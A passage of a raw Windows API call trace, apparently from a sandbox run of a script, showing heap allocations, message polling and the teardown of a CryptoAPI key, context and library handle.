returned 1 [0255.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0255.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0255.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0255.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0255.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0255.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0255.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0255.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0255.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0255.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0255.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0255.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0255.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0255.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0255.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0255.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0255.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51790, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0255.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0255.277] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0255.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0255.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0255.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0255.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0255.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0255.277] CryptDestroyKey (hKey=0xa87110) returned 1 [0255.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0255.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0255.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0255.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0255.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0255.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0255.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0255.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0255.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0255.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0255.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0255.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0255.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0255.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0255.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0255.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0255.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0255.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0255.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0255.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0255.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0255.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0255.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0255.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0255.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0255.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0255.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0255.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0255.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0255.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0255.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0255.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0255.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0255.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0255.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0255.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0255.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0255.279] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0255.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0255.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0255.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0255.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0255.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0255.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0255.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0255.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0255.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0255.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0255.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0255.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0255.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0255.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0255.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0255.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0255.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0255.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0255.280] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0255.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0255.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0255.280] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0255.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0255.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0255.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51520 [0255.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0255.280] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0255.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0255.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0255.280] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0255.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0255.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0255.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51550 [0255.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0255.281] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0255.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0255.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0255.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0255.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0255.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0255.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0255.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0255.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0255.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0255.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51568 [0255.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0255.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512e0 [0255.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51580 [0255.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51460 [0255.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0255.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0255.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51478 [0255.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515b0 [0255.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51310 [0255.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0255.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0255.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0255.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0255.282] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0255.282] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0255.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0255.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0255.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0255.282] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0255.283] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0255.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0255.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0255.283] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0255.283] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0255.283] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0255.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0255.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0255.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0255.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0255.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0255.284] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0255.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0255.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0255.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0255.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0255.284] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0255.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0255.284] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0255.284] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0255.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55df8 [0255.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0255.431] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0255.431] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0255.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0255.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0255.432] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0255.432] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0255.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0255.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0255.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0255.432] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0255.432] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0255.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0255.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0255.433] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0255.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0255.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0255.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0255.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f80 [0255.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0255.433] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0255.433] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0255.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0255.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0255.433] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0255.433] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0255.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0255.434] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0255.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0255.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0255.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0255.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0255.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0255.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69988, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0255.434] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0255.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0255.434] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0255.435] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0255.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0255.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0255.435] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0255.435] FreeLibrary (hLibModule=0x756e0000) returned 1 [0255.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0255.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0255.435] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0255.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0255.435] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0255.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0255.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0255.435] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.435] CloseHandle (hObject=0x2d0) returned 1 [0255.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0255.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0255.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0255.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0255.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0255.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0255.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0255.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0255.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0255.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0255.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0255.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0255.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0255.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0255.438] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.438] CloseHandle (hObject=0x2a0) returned 1 [0255.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0255.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0255.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0255.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0255.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0255.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: 